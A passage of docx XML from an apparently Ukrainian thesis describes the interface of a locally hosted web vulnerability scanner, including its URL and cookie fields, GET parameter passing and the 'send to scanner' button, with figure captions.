          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Перший пункт меню</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66564E6C" w14:textId="07EF0635" w:rsidR="0026169A" w:rsidRPr="005B4CE1" w:rsidRDefault="0026169A" w:rsidP="0026169A">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D53CA88" w14:textId="1502062C" w:rsidR="0026169A" w:rsidRDefault="0026169A" w:rsidP="0026169A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc30433160"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Описання другої вкладки програми</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="09B3860D" w14:textId="77777777" w:rsidR="00A575E1" w:rsidRPr="00A575E1" w:rsidRDefault="00A575E1" w:rsidP="00A575E1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A29482" w14:textId="7D31C034" w:rsidR="0026169A" w:rsidRDefault="0026169A" w:rsidP="0026169A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">За адресою </w:t>
      </w:r>
      <w:r w:rsidRPr="0026169A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://127.0.0.1:8000/#tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> розміщений </w:t>
      </w:r>
      <w:r w:rsidR="007A43A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">сканер вразливостей. На рис. 3.6 можна побачити початковий вигляд сканера ще до початку сканування. Сканер має два поля для заповнення де вказується </w:t>
      </w:r>
      <w:r w:rsidR="007A43A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="007A43A6" w:rsidRPr="007A43A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A43A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">адреса цільового сайту (обов’язкове поле для заповнення) і файли </w:t>
      </w:r>
      <w:r w:rsidR="007A43A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidR="007A43A6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, які використовуються, якщо на сайті є авторизація. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4B1EE0" w14:textId="3F667C8B" w:rsidR="0026169A" w:rsidRDefault="0026169A" w:rsidP="0026169A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59C4A8F3" w14:textId="7DB24369" w:rsidR="0026169A" w:rsidRPr="0026169A" w:rsidRDefault="0026169A" w:rsidP="0026169A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AD11260" wp14:editId="03573820">
            <wp:extent cx="6120130" cy="1351280"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="203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1351280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF988B4" w14:textId="1BD740B5" w:rsidR="007A43A6" w:rsidRDefault="007A43A6" w:rsidP="007A43A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Вигляд сканера до початку тестування</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDA1FAB" w14:textId="77777777" w:rsidR="00101F0F" w:rsidRDefault="00101F0F" w:rsidP="007A43A6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D00BDC7" w14:textId="1108AB96" w:rsidR="0026169A" w:rsidRDefault="007A43A6" w:rsidP="008016C0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>У нашому випадку</w:t>
      </w:r>
      <w:r w:rsidR="008016C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ми будемо вводити дані в обидва поля і використовувати метод </w:t>
      </w:r>
      <w:r w:rsidR="008016C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidR="008016C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AB6506" w14:textId="396D0F18" w:rsidR="008016C0" w:rsidRDefault="008016C0" w:rsidP="008016C0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Метод GET використовує для передачі даних строку URL. В нашому ви</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>па</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>дку це відбувається так</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>им чином</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008016C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>sqli/?id=&amp;Submit=Submit#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рис 3.6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8DB5F" w14:textId="408D7ADF" w:rsidR="008016C0" w:rsidRDefault="008016C0" w:rsidP="008016C0">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Дані обробляються в slqi, після знаку «?» іде перечислення даних, які будуть передаватися (параметри розділяються знаком «&amp;») зі значеннями</w:t>
      </w:r>
      <w:r w:rsidRPr="008016C0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Дані будуть зберігатися в супер глобальному масиві $_GET.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7DD2A9" w14:textId="09076EFF" w:rsidR="008016C0" w:rsidRPr="0098124E" w:rsidRDefault="008016C0" w:rsidP="0098124E">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="22"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D39D8B1" w14:textId="00C61C4D" w:rsidR="008016C0" w:rsidRDefault="008016C0" w:rsidP="008016C0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B38610E" wp14:editId="6FEE0EA3">
            <wp:extent cx="6120130" cy="723265"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="196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723265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C5C4AF" w14:textId="4BC0AB00" w:rsidR="008016C0" w:rsidRPr="008016C0" w:rsidRDefault="008016C0" w:rsidP="008016C0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Передача параметрів методом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27220FB8" w14:textId="60C1BC3D" w:rsidR="008016C0" w:rsidRDefault="008016C0" w:rsidP="008016C0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035F6B6C" w14:textId="7674CF21" w:rsidR="008016C0" w:rsidRPr="009C4E6F" w:rsidRDefault="009C4E6F" w:rsidP="009C4E6F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Після того як ми увели дані в поля нам потрібно натиснути кнопку «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4E6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4E6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="009C4E6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>як зображено на рис 3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B0B52A" w14:textId="77777777" w:rsidR="009C4E6F" w:rsidRPr="0098124E" w:rsidRDefault="009C4E6F" w:rsidP="0098124E">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F4221C" w14:textId="6AA99CA9" w:rsidR="008016C0" w:rsidRDefault="008016C0" w:rsidP="008016C0">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="387B6280" wp14:editId="52A1C93E">
            <wp:extent cx="6120130" cy="1242695"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="146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1242695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4953C307" w14:textId="727BC536" w:rsidR="009C4E6F" w:rsidRPr="008016C0" w:rsidRDefault="009C4E6F" w:rsidP="009C4E6F">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="006A3E9D">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="002B7D87">
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Процес заповнення полів даними</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0DC98" w14:textId="472A5FD0" w:rsidR="008016C0" w:rsidRDefault="008016C0" w:rsidP="0098124E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAA8627" w14:textId="77777777" w:rsidR="00A575E1" w:rsidRPr="0098124E" w:rsidRDefault="00A575E1" w:rsidP="0098124E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0DB5C8" w14:textId="731C58BF" w:rsidR="008016C0" w:rsidRDefault="009C4E6F" w:rsidP="009C4E6F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Коли дані були надіслані до сканера потрібно зачекати певний проміжок часу, це потрібно для того щоб сканер перевірив кожен параметр на вразливість і спробував корисні навантаження для кожного </w:t>
      </w:r>
      <w:r w:rsidR="00A719C8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
